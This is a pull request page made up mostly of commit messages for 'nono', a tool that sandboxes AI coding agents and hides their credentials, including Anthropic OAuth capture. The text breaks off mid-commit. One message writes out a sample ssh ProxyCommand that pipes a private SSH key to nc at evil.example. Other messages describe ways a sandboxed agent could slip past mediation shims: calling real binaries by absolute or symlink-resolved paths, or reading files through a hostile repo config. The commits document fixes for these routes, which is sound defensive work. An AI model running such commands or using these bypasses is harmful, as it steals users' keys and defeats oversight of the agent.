feat: credential_routes — credential mediation for Anthropic OAuth + gateway routes#51
Draft
christine-at-datadog wants to merge 48 commits into
Draft
feat: credential_routes — credential mediation for Anthropic OAuth + gateway routes#51christine-at-datadog wants to merge 48 commits into
christine-at-datadog wants to merge 48 commits into
Conversation
Introduces a mediation framework that intercepts command execution within sandboxed sessions, requiring admin approval for sensitive operations. Includes audit trail logging, Unix socket control server, and per-command sandbox shims. Signed-off-by: James Carnegie <me@kipz.org>
Adds a macOS menu bar application that discovers active nono sessions and provides a UI for reviewing and approving/denying mediated commands. Signed-off-by: James Carnegie <me@kipz.org>
Signed-off-by: James Carnegie <me@kipz.org>
Commands like `gh` authenticate via macOS Keychain using mach-lookup IPC to securityd. The per-command Seatbelt sandbox blocks these mach-lookups by default, causing 401 auth failures when gh tries to retrieve its stored GitHub token. Add `keychain_access: bool` to CommandSandbox. When true, the per-command sandbox grants read access to keychain DB files (login.keychain-db, metadata.keychain-db), which triggers the existing mach-lookup deny skip in the Seatbelt profile generator. This allows commands to authenticate via keychain while keeping all other sandbox restrictions (filesystem, network allowed_hosts) intact. Also documents that the Approve action intentionally runs without a per-command sandbox (None) because Seatbelt blocks keychain mach-lookup even with keychain file grants insufficient for all auth paths. Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: James Carnegie <me@kipz.org>
After the explicit pass, `profile::expand_vars` now resolves any remaining
`$VAR` / `${VAR}` tokens (uppercase+underscore+digit names) from the
process environment. Unset vars are left literal, matching the existing
`$XDG_RUNTIME_DIR` fallback so downstream `add_sandbox_*` helpers log
"does not exist, skipping" rather than failing the session.
Also switches per-command mediation sandbox paths from `expand_home`
to `expand_vars` so `$WORKDIR`, `$HOME`, XDG vars, and any launch-time
env var (e.g. a caller-provided `$GIT_ROOT`) resolve consistently in
both the main and per-command sandboxes. `SessionCtx` gains a `workdir`
field threaded from `execution_runtime` through `session::setup` and
`server::run` so per-command expansion uses the same workdir as the
rest of nono.
`expand_vars` already resolved $VAR / ${VAR} tokens in top-level
filesystem paths, policy.* paths, command_args, and per-command
sandbox paths. Extend the same expansion to the remaining
user-authored string fields in the profile:
- `mediation.commands[].intercept[].args_prefix` — the intercept
matcher compared each entry literally against the incoming argv,
so `"$USER"` used to be a dead string. Expanding at profile-load
time lets authors write session-aware matchers (e.g. the macOS
Keychain `security find-generic-password <user> ...` rule) without
install-time `sed` substitutions over the profile file.
- `mediation.commands[].binary_path` — consumed verbatim by `PathBuf::from`,
now expanded so profiles can point at user-specific binaries like
`$HOME/.local/bin/tool`.
- `network.custom_credentials[].{tls_ca,tls_client_cert,tls_client_key}` —
previously used the narrower `policy::expand_path` which only handled
`~`, `$HOME`, `$TMPDIR`. Switched to the full `expand_str` so any
configured env var (e.g. `$XDG_CONFIG_HOME`) resolves.
Introduces `profile::expand_str` as the string-returning core of the
expansion pipeline. `expand_vars` now delegates to it. Threads the
session `workdir` through `resolve_credentials`, `build_proxy_config_from_flags`,
`start_proxy_runtime`, and `resolve_command` so `$WORKDIR` resolves
consistently across all expansion sites.
Stamps each audit.jsonl entry with session_id, session_name, nono_pid, sandboxed_pid, and command_pid so operators can correlate commands across a session and trace the full process hierarchy. Process hierarchy per log entry: nono_pid — the nono supervisor (unsandboxed parent) sandboxed_pid — the direct child process nono sandboxed (e.g. claude, codex) command_pid — the shim process that ran the specific command (e.g. echo, git) The session_id/session_name are pre-generated in execution_runtime before mediation setup so audit.jsonl and the session record share the same values. sandboxed_pid is resolved after fork via an Arc<OnceLock<u32>> latch shared between the mediation server and the on_fork callback. ShimRequest gains a pid field so the mediated path can record command_pid. The shim's AuditEvent also gains command_pid for the audit-only datagram path. All new AuditEvent fields use #[serde(default)] for backward compatibility with older shims that do not send them. Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Mediated passthrough previously buffered stdio: the shim read stdin with a 50ms timeout into a UTF-8 String, the server spawned the real binary with Stdio::piped() + wait_with_output(), and the parent's ChildStdin dropped before the child could read. ssh/git over a binary pipe hit SIGPIPE; every long-running mediated command (gh, kubectl, ...) silently buffered output until exit. The shim now sends its stdin/stdout/stderr fds via SCM_RIGHTS after the JSON request. The server passes them straight to the real binary via Stdio::from(...) for no-intercept passthrough (and the allow_commands sub-branch and admin_passthrough), then wait()s. Capture/Respond/Approve drop the passed fds and keep the existing buffered behaviour so they can still inspect or transform the output. The shim's stdin field is removed from ShimRequest (so was the read_stdin_nonblocking helper); shim and server are versioned together, no wire compatibility is needed. Tests: added a streaming socketpair harness, a binary-roundtrip test covering 0xFF bytes through stdin/stdout, and a Respond-path test that verifies the dropped fds let the test side see EOF.
… command Adds an optional CallerPolicy on each CommandEntry: - agent_allowed: bool (default true) — whether the primary sandbox (no NONO_SANDBOX_CONTEXT) may invoke this command. - allowed_parents: Option<Vec<String>> — restrict which mediated parents may invoke. None (field absent) accepts any parent (existing behaviour). Some([]) blocks every mediated parent. Some(["git"]) permits only the listed parents. The gate fires at the top of apply(), before the existing allow_commands skip-intercepts branch, so a parent allowed by allowed_parents still flows through unchanged. Rejected calls return exit 126 with action_type "denied". Defaults preserve full backward compatibility: a profile with no caller_policy field on a command keeps current behaviour (agent + any parent allowed). Use case: ssh / ssh-keygen in shadowfax — set agent_allowed=false, allowed_parents=["git"] so a malicious prompt cannot invoke them directly to authenticate to attacker-controlled hosts (or sign arbitrary data) using the user's keys via the per-command sandbox.
Sending three separate sendmsg(SCM_RIGHTS) calls for stdin/stdout/stderr fails with EMSGSIZE (os error 40) on macOS when the socket receive buffer already holds a large JSON request — as happens when git is invoked from within gh's execution sandbox, which adds proxy and session env vars. Replace the three individual sends with a single sendmsg carrying all three fds in one SCM_RIGHTS control message, and update recv_three_fds to receive them in a matching single recvmsg call. This is the standard idiom for passing multiple fds and avoids the macOS control-buffer constraint entirely. Fixes: DataDog/shadowfax#95
The shim now sends its own cwd in `ShimRequest.cwd`, and the server sets it on the spawned binary via `Command::current_dir`. Without this, the spawned binary inherited the mediation server's launch cwd. Tools that resolve config from cwd silently operated on the wrong target — `git` in a worktree being the canonical case: discovery would walk up from the server's cwd, find the wrong `.git`, and report the wrong branch and toplevel. The new field is `Option<String>` with `#[serde(default)]`: - old shim → new server: missing field → legacy behaviour (server cwd) - new shim → old server: extra field is ignored - unreadable cwd: shim sends None → legacy behaviour - non-directory cwd: server logs a warning and falls back to its own cwd Adds `test_passthrough_uses_request_cwd`: drives `apply()` end-to-end with a real `/bin/pwd` and asserts the spawned process prints the caller's cwd, not the server's.
The mediation/* and nono-shim formatting drift accumulated across the 13- commit mediation series. Folding the fmt fixes into the originating commits caused conflicts because subsequent mediation commits re-touched the same lines, so capture the cumulative fmt result here instead. Signed-off-by: James Carnegie <me@kipz.org>
When nono creates an audit shim for a binary at session start, the shim later runs `resolve_real_binary` which re-walks PATH to find the real target. Intermediate shells (e.g. husky pre-commit hooks, lint-staged workers) often munge PATH between session start and shim invocation, stripping user toolchain dirs that contained the real binary. The walk then returns nothing and the shim reports `nono-shim: <name>: command not found` even though the real binary is still on disk at the path nono saw at session start. This change makes audit shim resolution deterministic by recording the resolved absolute path at session start and consulting it first at exec time: - A new sibling dir `<session_dir>/shim-sources/` holds one sidecar per shim — `<name>` containing the absolute path of the binary the shim was created for. Both mediated commands and universal audit shims write a sidecar. - `SessionHandle` exposes `shim_sources_dir` and the path is forwarded to mediated subprocesses via a new `NONO_SHIM_SOURCES_DIR` env var (alongside `NONO_SHIM_DIR`). The session-level dir is reused for filtered per-command sandboxes — sidecars are created once and shared, since the recorded paths do not change. - `nono-shim::resolve_real_binary` now consults `NONO_SHIM_SOURCES_DIR/<name>` first and only falls back to the existing PATH walk if the sidecar is missing or its recorded path is no longer an executable file. Tests: - 8 new unit tests in nono-shim cover sidecar hits, missing dirs, trimming, deleted/non-executable targets, and the PATH-walk fallback. - 2 new unit tests in mediation::session cover sidecar writes and overwrites. - The existing `test_allow_commands_sets_nono_shim_dir_to_filtered_dir` test is extended to assert `NONO_SHIM_SOURCES_DIR` is forwarded unchanged into the per-command sandbox env.
…main
When a profile sets `network.allow_domain`, nono switches to
`NetworkMode::ProxyOnly`, which emits `(deny network*)` plus narrow
exceptions for the proxy port and DNS. Seatbelt classifies AF_UNIX
`connect(2)` as `network-outbound`, so the base deny blocks the
audit/mediation shim's connect to `<session_dir>/{mediation,control,
audit}.sock`.
`emit_unix_socket_rules` only emits exceptions for explicit
`UnixSocketCapability` entries; the `FsCapability` directory grant
the runtime adds for `handle.session_dir` covers file ops but not
socket connect. Under `NetworkMode::AllowAll` (default with no
`allow_domain`) the bug was masked by `(allow network-outbound)`.
Add a directory-scoped `UnixSocketCapability::new_dir(session_dir,
Connect)` alongside the existing FsCapability so the regex carve-out
covers all three direct-child sockets without leaking access deeper
under the session dir. Existing rule-emission tests in sandbox/macos.rs
already cover the directory-grant + ProxyOnly path
(test_generate_profile_unix_socket_dir_emits_non_recursive_regex).
Fixes #33.
Replace whole-replacement of `mediation` in merge_profiles with a per-field merge. The legacy behaviour fully replaced base mediation when child declared any mediation block, which silently dropped every mediated command the base set up — a footgun when downstream profiles add a single command via `extends`. Merge rules: - commands: keyed by `name`. Same-name collisions get per-field merge (binary_path child-wins, intercept rules dedup by args_prefix with child first under first-match-wins, sandbox recursive-merges, caller_policy applies restrictive-wins). Distinct names append: base first, then names new to the child. - env.block: dedup_append. - CommandSandbox: network.block and keychain_access OR; allowed_hosts and fs_*/allow_commands union via dedup_append. - CallerPolicy.agent_allowed: AND (managed deny survives a permissive child). allowed_parents: None==any, Some==restriction, intersection of two Somes preserves the strictest. Adds 14 unit tests in mediation::merge::tests covering each rule (name append/collide, intercept dedup, AND/intersection, network.block OR, allowed_hosts/fs union, env block union, empty-base/empty-child, is_active invariant).
Previously, nonce promotion fired only when an exec'd mediated command's
argv element or sandbox-env value *began* with `nono_`. That breaks any
caller that embeds the nonce inside a wider string — the canonical case
being an HTTP header built up by a shell script:
token=$(some-mediated-cmd auth)
curl -H "X-Token: $token" https://example/
Here `-H` is followed by `X-Token: nono_<64-hex>`, which fails the
`starts_with("nono_")` check, so curl receives the literal nonce instead
of the real token. The only workaround was to demand callers separate
the credential from its envelope ("export TOKEN=…; curl -H \"X-Token: \$TOKEN\""
won't help — curl's argv still contains the prefixed nonce).
This change replaces the prefix check with a substring rewrite. Any
`nono_` followed by 64 lowercase hex characters is resolved against the
broker and substituted in place. Unmatched (unknown) nonces are left
verbatim, matching the existing argv behaviour and avoiding a probing
oracle. The same rewrite is applied inside env values (e.g.
`AUTH_HEADER="Authorization: Bearer nono_…"`).
Behaviour notes:
- The prefix `nono_` is ASCII, so the byte-level scan never lands
inside a multi-byte UTF-8 character.
- 64 lowercase hex chars is the exact format `TokenBroker::issue` emits;
uppercase hex and shorter sequences are deliberately not matched so
noisy input strings cannot accidentally trigger a resolve.
- One existing env test (`test_build_exec_env_discards_unknown_nonce`)
encoded the old "discard the whole var on unknown nonce" behaviour;
it is renamed and asserts the new "leave the literal text in place"
contract instead, matching the argv path.
Added unit tests cover: pure-nonce arg, embedded nonce, multiple nonces
in one arg, malformed `nono_` prefix without 64 hex chars, malformed
prefix with uppercase hex, unknown but well-formed nonce, empty input,
no-match passthrough, and the env-value substring path including the
`DANGEROUS_ENV_VAR_NAMES` block.
Previously, mediation session setup walked every directory on PATH and
symlinked `nono-shim` for any executable not already mediated. Each
invocation of those non-mediated commands went through `run_audit` in
nono-shim, which used `Command::status()` (fork + wait) and emitted a
fire-and-forget audit event via a datagram socket. Mediated commands
continue to flow through `run_mediated` as before.
The universal-audit path had two material costs:
1. Process accounting. Every non-mediated command kept a shim parent
resident waiting on its child. Under heavy parallel workloads this
doubled the steady-state process count and could push the user past
the per-user `RLIMIT_NPROC` soft limit, at which point the shim's
spawn returned EAGAIN ("Resource temporarily unavailable") and the
command failed.
2. Surface area. The shim carried sidecar-resolution machinery, a second
exec mode, and three env vars (`NONO_AUDIT_SOCKET`,
`NONO_MEDIATED_COMMANDS`, `NONO_SHIM_SOURCES_DIR`) that only existed
to support the audit path.
This change removes the universal-audit pass and the dead code it
supported:
- `mediation/session.rs` no longer walks PATH to symlink shims, no longer
binds an audit datagram socket, and no longer writes source sidecars.
`SessionHandle` loses `shim_sources_dir`, `mediated_commands`, and
`audit_socket_path`.
- `mediation/server.rs` drops `run_audit_receiver`, `bind_dgram_owner_only`,
and the audit-socket bind. `log_mediated_audit` + `append_audit_log`
remain for mediated-command logging.
- `mediation/policy.rs` drops `shim_sources_dir` from `SessionCtx` and
the `NONO_SHIM_SOURCES_DIR` env forwarding (no consumer remains).
- `execution_runtime.rs` no longer exports `NONO_AUDIT_SOCKET`,
`NONO_MEDIATED_COMMANDS`, or `NONO_SHIM_SOURCES_DIR` to the child.
- `nono-shim/main.rs` drops `run_audit`, `send_audit_event`, the
`AuditEvent` struct, `is_mediated`, and the `resolve_real_binary`
sidecar/PATH-walk fallback. `run()` always calls `run_mediated()`
because every shim symlink in the session dir is now a mediated
command by construction.
- `tests/integration/test_mediation_audit.sh` removed; the rest of the
mediation suite covers the remaining flows.
Also folds in the outstanding fmt + clippy suggestions on the touched
files so the workspace passes `cargo clippy --workspace --all-targets
--all-features -- -D warnings -D clippy::unwrap_used` and `cargo fmt
--check`.
Net: 130 added / 1186 removed across 10 files. `cargo test --workspace`
runs 2187 tests, all green.
Profile authors can now place `@<provider>:<query>` tokens in any
access-granting path list (top-level `filesystem.{allow,read,write,
allow_file,read_file,write_file}` or per-command
`mediation.commands[].sandbox.{fs_read,fs_read_file,fs_write,
fs_write_file}`). At profile finalize the token is replaced inline by
the named provider's expansion, splicing one or more concrete paths
into the list in place.
The first built-in provider is `@git:read-paths`, which shells out to
`git config --list --show-origin` and returns every file in the
effective config chain plus the values of well-known path-valued keys
(core.attributesFile, core.excludesFile, core.hooksPath,
commit.template). This lets a profile that mediates `git` cover the
files git itself wants to read at startup without enumerating every
per-user dotfile location.
Behaviour:
- Literal paths pass through unchanged.
- Tokens with unknown providers/queries fail profile-load with a clear
error, so typos surface immediately instead of later as
capability-construction failures on a path named `@foo:bar`.
- Missing `git` binary or non-zero exit is treated as "no expansion"
(silent empty list), so the profile keeps working in environments
without git.
Excluded fields: deny / bypass_protection / suppress_save_prompt —
fanning a token out into deny rules has confusing semantics, and the
bookkeeping fields are not capability grants.
Before this change, the provider ran `git config --list --show-origin` from the agent's cwd. If that cwd is inside a git repo, the result included entries from per-repo `.git/config` — and any path-valued keys in that scope (`core.attributesFile`, `core.excludesFile`, `core.hooksPath`, `commit.template`) would be added to the sandbox's read-allow list at session start. That created a real sandbox-bypass primitive in the clone-and-run threat model: a malicious repo could set `[core] attributesFile = /etc/passwd` in its `.git/config`, and the next agent session started inside that clone would whitelist `/etc/passwd` for the mediated `git` command. The fix filters the provider's output by config scope. The CLI invocation switches to `--show-scope` (without `--global`, because the CLI scope flag suppresses `include.path` traversal — losing the main reason the provider exists). The parser then keeps lines tagged `global` or `system` and drops `local` / `worktree` / `command`. Coverage preserved: - `~/.gitconfig` + its full `include.path` / `includeIf` chain - `/etc/gitconfig` (admin-controlled, trusted) - All path-valued keys set in those scopes Coverage removed (intentionally): - Per-repo `.git/config` path-valued overrides. These are rarely used in practice for the keys this provider cares about, and the repo's own working tree is already accessible to the mediated git command via the profile's static fs_read grants. Tests: - New `git_read_paths_excludes_per_repo_local_config_overrides` — end-to-end regression that creates a real hostile `.git/config`, invokes the provider from inside the repo, and asserts the local scope's `/etc/passwd` attributesFile does NOT leak into the output while the global scope's path does. - New `git_read_paths_from_stdout_drops_local_and_worktree_scopes` — unit-level check of the parser-side filter. - Existing stdout-format tests updated to the new `<scope>\t<origin>\t<key>=<value>` shape.
Routing `core.hooksPath` (a directory) through the same expansion as
`core.attributesFile` and friends (files) caused capability-construction
failures in consumers that placed `@git:config-paths` in `fs_read_file`:
that list only accepts files, so the hooks directory entry was silently
rejected and the hook scripts under it remained unreachable.
This splits the provider so each kind goes to the right capability
list:
- `@git:config-files` — every config file in the effective `global` +
`system` chain (with `include.path` / `includeIf` traversal) plus the
values of file-typed path keys (`core.attributesFile`,
`core.excludesFile`, `commit.template`). Intended for `fs_read_file`.
- `@git:hooks-path` — value of `core.hooksPath` from `global` or
`system` scope, if set. Intended for `fs_read`.
Internally the parser now returns a `GitConfigPaths { files, dirs }`
struct and the two query functions project the appropriate field. The
single-shell-out variant `read_paths()` is removed; consumers call
`read_files()` / `read_hooks_path()` directly.
The local/worktree-scope filter is unchanged: only `global` and
`system` lines contribute paths, so a hostile per-repo `.git/config`
still cannot widen the sandbox.
Tests updated to reflect the new split, and a dedicated
`parse_paths_from_stdout_routes_hooks_path_to_dirs` regression locks in
the routing.
Note: `@git:config-paths` no longer exists. Profiles that referenced
the old name must move to `@git:config-files` (in `fs_read_file`) plus
`@git:hooks-path` (in `fs_read`) where applicable.
Move `caps.platform_rules()` emission from between read-allows and
write-allows to AFTER write-allows. Targeted denies carried via
`add_deny_access`, group deny rules, and `unsafe_macos_seatbelt_rules`
were silently overridden by broad user write allows because Seatbelt is
last-rule-wins for filtered rules of the same operation.
Reproduces directly with `sandbox-exec`:
(allow file-write* (subpath "/"))
(deny file-write* (subpath "/protected"))
=> write to /protected DENIED
(deny file-write* (subpath "/protected"))
(allow file-write* (subpath "/"))
=> write to /protected SUCCEEDS
The previous comment ("more specific rules always win regardless of
order") is not how Seatbelt behaves for filtered subpath rules. The
deny-unlink case the old order was protecting against is preserved
because `(deny file-write-unlink)` is unselectored and blocks regardless
of where it sits relative to selectored write allows (verified via
`sandbox-exec`).
Updates two unit tests that asserted the old (broken) order and adds
explicit coverage for `(deny file-write* (subpath ...))` landing after
write allows.
Two E0283 ambiguities introduced when typed_path entered the dependency tree (via sigstore-sign 0.8.0): AsRef<_> on Cow<str> became ambiguous between alloc and typed_path impls. Fix by adding explicit `as &str` casts at the two call sites. Also fix a test using credential_format: String (now Option<String>) after the network_policy field type change in main. Signed-off-by: James Carnegie <me@kipz.org>
Per-command Seatbelt sandboxes previously allowed `process-exec*` unconditionally. A command granted `fs_read` on a sensitive directory (e.g. `ssh` with `~/.ssh`) could spawn an arbitrary child that inherited the same grants and exfiltrated the data — for example, `ssh -o ProxyCommand="/bin/sh -c 'cat ~/.ssh/id_ed25519 | nc evil.example'"`. Changes: - `CapabilitySet`: new `restrict_process_exec()` builder plus `allow_exec_path()` / `allow_exec_subpath()` for the allowlist. Default-off — top-level / non-mediated profiles are unaffected. - `macos::generate_profile`: emits explicit `(allow process-exec (literal|subpath ...))` rules when restriction is set, otherwise retains the historical blanket `(allow process-exec*)`. - `CommandSandbox`: new `allow_process_exec: bool` field (default false) as a broad opt-out for commands with helper sprawl — git, gh, aws, kubectl, etc. — where enumerating helpers is impractical. Merges with AND so an extending profile cannot loosen base policy. - Mediation `policy.rs`: per-command sandboxes now call `restrict_process_exec()` unless `allow_process_exec` is set; the command's own binary, the nono-shim (for nested mediation), and every `allow_commands` target are exec-allowed by path. This lets `allow_commands` bypass the shim entirely — listed binaries run inside the caller's sandbox without re-mediation. `process-fork` remains allowed so threading and fork-without-exec keep working; the kernel's deny on exec is what closes the escape.
Previously exec_passthrough was called with None for the sandbox when a
command was reached via a parent's allow_commands list, leaving the child
entirely unsandboxed. This re-opens the ProxyCommand exfil class that the
process-exec default-deny is designed to close (issue nolabs-ai#249).
Signed-off-by: James Carnegie <me@kipz.org>
Add a "Per-command Sandboxes" section to profile-authoring.mdx covering all CommandSandbox fields (fs_read/write, network, keychain_access, allow_commands, allow_process_exec) with an example and a warning that allow_process_exec: true widens the sandbox back to pre-v0.59.0 behaviour for that command. Update the policy.rs code comment to reference the new docs section. Signed-off-by: James Carnegie <me@kipz.org>
…undary Adds test_allow_process_exec_does_not_bypass_fs_sandbox: verifies that even with allow_process_exec: true, subprocesses spawned inside a per-command sandbox cannot read files outside the sandbox's fs_read grants. This guards the git-via-allow_process_exec concern: git carries allow_process_exec: true for hooks/helpers, but a subprocess it spawns (e.g. ssh via ProxyCommand) must still be confined to git's filesystem grants and cannot exfiltrate files like ~/.ssh private keys. Uses ENV_LOCK when reading HOME to avoid a race with tests that temporarily set HOME to a /tmp path (rollback_runtime, exec_strategy). Signed-off-by: James Carnegie <me@kipz.org>
…pass Mediation shims intercept commands invoked by name via a PATH-prepend shim directory. Without a corresponding seatbelt deny rule on each mediated command's real binary path, the sandboxed agent can invoke the binary directly by absolute path — bypassing the shim and receiving the real credential instead of a nonce. `SessionHandle.blocked_binaries` was already populated with the real path of every mediated command (field doc: "for seatbelt deny rules") but was never consumed; the field has been dead since mediation was introduced. This change wires `blocked_binaries` into the agent's capability set: - `CapabilitySet::deny_exec_path()` — new builder method that records paths to deny. - `generate_profile()` (macos.rs) — emits `(deny process-exec (literal "<path>"))` after `(allow process-exec*)` in the unrestricted branch. Seatbelt is last-rule-wins for same-operation filtered rules, so the deny placed after the broad allow takes precedence. - `execution_runtime.rs` — consumes `handle.blocked_binaries` and calls `caps.deny_exec_path()` for each, closing the bypass for all mediated commands (gh, security, ddtool, kubectl, glab, aws-vault, etc.). The deny is a no-op in restricted exec mode (`restrict_process_exec`), where the allowlist model already excludes unlisted paths via the implicit deny default. Verified: `/opt/homebrew/bin/gh auth token`, `/usr/bin/security find-internet-password -s github.com -w`, and `/usr/bin/security find-generic-password -s gh:github.com -w` all return nonces (or are blocked) when called by absolute path inside the sandbox. Four unit tests added to `sandbox::macos::tests` covering: deny rules emitted after allow-all, special-char escaping, no-op in restricted mode, and no spurious rules in default caps.
When Ctrl-Z is pressed inside a nono session, the outer terminal is in raw mode (ISIG cleared), so the byte 0x1A is forwarded to the PTY slave rather than raising SIGTSTP on nono itself. The PTY slave has ISIG set, so the kernel delivers SIGTSTP to the agent's process group — the agent stops. Previously waitpid was called without WUNTRACED, so the stopped child was never observed and the supervisor loop spun indefinitely with the outer terminal frozen in raw mode. Fix: add WUNTRACED to the three PTY-backed waitpid calls so stopped children are visible. On WaitStatus::Stopped(SIGTSTP), restore the outer terminal (pause_terminal_for_prompt), raise SIGTSTP on nono so the parent shell takes over the terminal, then on resume re-enter raw mode (resume_terminal_after_prompt) and send SIGCONT to the agent. This is the standard PTY-proxy job-control pattern used by tmux, ssh, and script. Other stop signals (SIGSTOP, etc.) keep the existing log-and-continue behaviour since they cannot be caught for the raise/resume dance.
The previous approach (WUNTRACED + WaitStatus::Stopped) did not work because nono calls setsid() in the child to create a new session, which makes the child's process group orphaned. The kernel discards SIGTSTP's default stop action for orphaned process groups, so waitpid(WUNTRACED) never observed a stopped child. The fix intercepts the raw 0x1a byte (Ctrl-Z) in filter_client_input before it reaches the inner PTY master. On interception, the supervisor: 1. Sends SIGSTOP to the child (unconditional stop, bypasses orphan-PG rule) 2. Calls pause_terminal_for_prompt() to restore the outer terminal 3. Raises SIGTSTP on itself to suspend the supervisor 4. On SIGCONT (user runs fg): calls resume_terminal_after_prompt() 5. Sends SIGCONT to the child to resume it The WUNTRACED + WaitStatus::Stopped(SIGTSTP) path is retained as a fallback for external SIGTSTP delivery. Four unit tests cover filter_client_input interception and the take_job_control_request() one-shot semantics.
Adds the missing counterpart to pause_terminal_for_prompt, called after the supervisor returns from raise(SIGTSTP). Re-enters raw terminal mode and replays the screen so the attach view is restored. Signed-off-by: James Carnegie <me@kipz.org>
which::which resolves the first executable in PATH but does not follow symlinks. The blocked_binaries deny rule was emitted only for the as-found path (e.g. /opt/homebrew/bin/gh), leaving the real binary target (/opt/homebrew/Cellar/gh/2.92.0/bin/gh) unblocked. An agent could bypass mediation by calling the canonical path directly. Fix: after pushing the as-found path to blocked_binaries, also push the canonicalized path if it differs. Seatbelt deny rules are then emitted for both paths, closing the symlink bypass. Verified by test-mediation-absolute-path.sh: gh auth token via the resolved Cellar path is now blocked with exit 126.
…ver)
Adds the proxy-side machinery to capture and substitute Anthropic OAuth
tokens. Used by the nono-cli wiring in the next commit (`oauth_capture`
profile flag) but kept here as a self-contained primitive: any other
nono-cli client could drive these routes/hooks against a different
upstream by supplying a `TokenResolver`.
## Components
- `oauth_rewrite::rewrite_oauth_json_body` — Layer 1 response-body
rewriter. Parses Anthropic's OAuth token response, mints two nonces
via `TokenResolver::capture_oauth_pair`, substitutes them in the
body. Drops `Content-Length`/`Transfer-Encoding`/`Content-Encoding`
so hyper re-frames the response. Includes chunked-transfer decoding
before invoking the hook.
- `config::InjectMode::OauthCapture { token_url_match, refresh_url_match }`
— new variant that flags a route as OAuth-capture eligible.
- `route::LoadedRoute::requires_intercept` — extended so OauthCapture
routes trigger TLS interception even without `credential_key` or
`endpoint_rules`.
- `route::LoadedRoute::oauth_capture_match` — pre-compiled pattern
matchers populated when the route's `inject_mode` is OauthCapture.
- `tls_intercept::handle` — Layer 1.2 inside-CONNECT-tunnel bearer
swap: rewrites `Authorization: Bearer nono_<hex>` to the real
bearer on egress. Required for the Console flow's immediate
`/v1/oauth/claude_cli/create_api_key` call within the same tunnel.
- `reverse` — Layer 2 reverse-proxy bearer swap for ongoing API
calls outside the CONNECT tunnel.
- `forward` — response-hook plumbing through the forwarding path.
- `audit::log_oauth_capture` — audit event on every minted nonce pair.
- `broker.rs` — `TokenResolver` trait with `issue` / `resolve` /
`capture_oauth_pair` default. Provides the seam by which nono-cli's
`TokenBroker` plugs into the proxy.
- `server.rs` — `ProxyRuntime { token_resolver }` parameter for
passing the resolver in at startup. Adds the reserved `__nono_`
route-prefix namespace so user-supplied profiles cannot collide
with the synthesised capture routes.
- `Cargo.toml` — adds `bytes` direct dep (used by `oauth_rewrite` for
buffered body manipulation).
## Build state
This commit introduces `InjectMode::OauthCapture` but does not handle
it in nono-cli's pattern matches (which still expect the four
pre-existing variants). The next commit adds those handlers. CI runs
against the PR tip, so the intermediate-commit build state is not
load-bearing. The final tree builds cleanly.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Drives the nono-proxy OAuth-capture primitive (previous commit) via a
single profile flag. Adds the mediation-shim `format: \"json\"` capture
that the 2026-06-03 plan settled on for protecting the
`Claude Code-credentials` keychain envelope without rewriting it.
## Flag + auto-injection
- `profile.oauth_capture: bool` — opt-in field on the profile schema.
- When true, the CLI auto-injects three TLS-intercept routes
(`api.anthropic.com`, `claude.ai`, `platform.claude.com`) into the
proxy config and wires the in-memory `TokenBroker` as the proxy's
`TokenResolver`. Profile schema + builder docs updated.
## API-key preflight fail-closed (macOS)
`crates/nono-cli/src/oauth_preflight.rs` refuses to start the proxy
when an API-key surface is already present in the user's environment:
- `ANTHROPIC_API_KEY`, `CLAUDE_CODE_API_KEY_FILE_DESCRIPTOR`,
`ANTHROPIC_UNIX_SOCKET` env vars (skipped if `denied_env_vars`
would strip them anyway)
- `primaryApiKey` in `~/.claude.json`
- macOS `Claude Code` (no `-credentials` suffix) keychain entry
The OAuth-capture path proxies `Authorization: Bearer` tokens; an
`x-api-key` request inside the CONNECT tunnel would 401 against
upstream. Failing closed before the child spawns produces a clear
diagnostic instead of a silent breakage.
## Mediation: JSON-format capture for keychain envelope substitution
Extends the mediation `capture` action with two new fields:
- `format: \"json\"` — parse stdout as JSON before extraction
- `secret_paths` — dotted JSON paths whose values are nonced
Used by shadowfax profile rules on `security find-generic-password
Claude Code-credentials` to mint nonces on every read of claude's own
keychain entry without rewriting it. Fail-closed on malformed JSON,
non-string values; missing paths silently skipped (documented
contract). Anthropic's `claudeAiOauth.{accessToken,refreshToken}` are
the only intended substitution targets; the `mcpOAuth.*` subtree
passes through unchanged so MCP plugins' credentials work.
Tests: full coverage of matched/missing/non-string paths + malformed-
JSON fail-closed (no credential leak via stdout or stderr) +
idempotence-of-shape with fresh nonces per call. End-to-end tests
through `mediation::policy::apply` exercise the dispatcher's
`Capture { format: Some(Json) }` arm against a realistic keychain-
envelope script.
## Argument-ordering regression tests
`security find-generic-password` accepts two argv orderings (account-
first and service-first). Each must have its own intercept rule —
profile authors who only ship one ordering have a leak path. Tests
pin `subcommand_matches` against both shapes and the flag-interleaved
variant.
## Pattern-match completeness
Extends nono-cli's pattern matches over `nono_proxy::config::InjectMode`
to cover the new `OauthCapture` variant introduced in the previous
commit. The intermediate-commit non-build state is now resolved.
## Documentation
- `docs/plans/2026-05-14-mediation-profile-authoring-ux.md`
- `docs/plans/2026-06-03-mediation-based-oauth-capture.md`
- `tests/integration/test_mediation_audit.sh`
## What this does NOT do
- No broker persistence (no cross-session resume yet). Per-session
in-memory broker only. Cross-session resume lands in the next
commit series.
- No code-signing entitlements. Future hardening option.
- Linux preflight removed (previously deleted in earlier work);
this commit ships only the macOS API-key check.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
…rs (macOS) Without persistence, the in-memory broker that holds real OAuth tokens dies when nono exits. Subsequent sessions find claude's keychain still populated with `nono_<hex>` nonces but the new broker can't resolve them — Anthropic returns 401 and the user has to `/login` again every session. This is a regression vs running `claude` outside nono. Persist the captured `(access_token, refresh_token)` pair to the macOS Keychain under `service="nono", account="claude_oauth_broker"`. On startup the broker hydrates from the persisted record and re-registers the same nonces it issued in the previous session, so the keychain entry the sandboxed claude reads continues to resolve. The broker keychain entry carries a strict trusted-application ACL listing only the nono binary by path. securityd enforces this by code signature — any other process (sandboxed claude, the `security` CLI, plugins reading the keychain directly via `SecItemCopyMatching`) is denied silently. This is what makes persisted real tokens unreachable from the agent even though shadowfax's profile grants the agent broad Mach IPC access to securityd. All Security framework calls run in-process (the nono binary, which is in the ACL) via `security-framework` + direct FFI for the legacy ACL APIs (`SecAccessCreate`, `SecTrustedApplicationCreateFromPath`, `kSecAttrAccess`) not re-exported by the safe crate. No `security` CLI subprocess — the original PR 40 attempt hit two bugs 